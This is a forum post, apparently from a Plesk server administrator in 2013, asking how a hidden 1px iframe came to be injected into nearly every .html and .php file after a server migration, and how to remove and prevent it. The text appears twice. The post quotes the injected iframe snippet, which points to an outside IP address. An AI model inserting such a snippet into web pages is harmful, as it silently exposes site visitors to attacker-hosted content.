I can't believe this...
In order to get a fresh start and increase security I recently migrated from an old FreeBSD 6 / Plesk 8.2 server to a brand spanking new Debian 6 Linux / Plesk 11.0.9 installation. I can confirm that the previous server was NOT compromised prior to migration.
Within two days of the new server being online the following code has been injected into EVERY SINGLE .html / .php file on the server. (Well I scanned the vhosts/ directory anyway and almost all domains were infected.
<!-- . --><iframe width="1px" height="1px" src="http://5.45.179.41/transport/replys-terribly-reading_works.php" style="display:block;" ></iframe>
1) Any idea how this could happen? (and so quickly)
2) How can I safely remove all of the malicious code?
3) How can I prevent this from happening again?
This is the first time in the 12 years I've been running a plesk server that I've had an issue like this so I'm at a bit of a loss.
OS Debian 6.0.7
Panel version 11.0.9 Update #51
The system is up-to-date; last checked at May 18, 2013 06:25 AM
Thanks in advance!
In order to get a fresh start and increase security I recently migrated from an old FreeBSD 6 / Plesk 8.2 server to a brand spanking new Debian 6 Linux / Plesk 11.0.9 installation. I can confirm that the previous server was NOT compromised prior to migration.
Within two days of the new server being online the following code has been injected into EVERY SINGLE .html / .php file on the server. (Well I scanned the vhosts/ directory anyway and almost all domains were infected.
<!-- . --><iframe width="1px" height="1px" src="http://5.45.179.41/transport/replys-terribly-reading_works.php" style="display:block;" ></iframe>
1) Any idea how this could happen? (and so quickly)
2) How can I safely remove all of the malicious code?
3) How can I prevent this from happening again?
This is the first time in the 12 years I've been running a plesk server that I've had an issue like this so I'm at a bit of a loss.
OS Debian 6.0.7
Panel version 11.0.9 Update #51
The system is up-to-date; last checked at May 18, 2013 06:25 AM
Thanks in advance!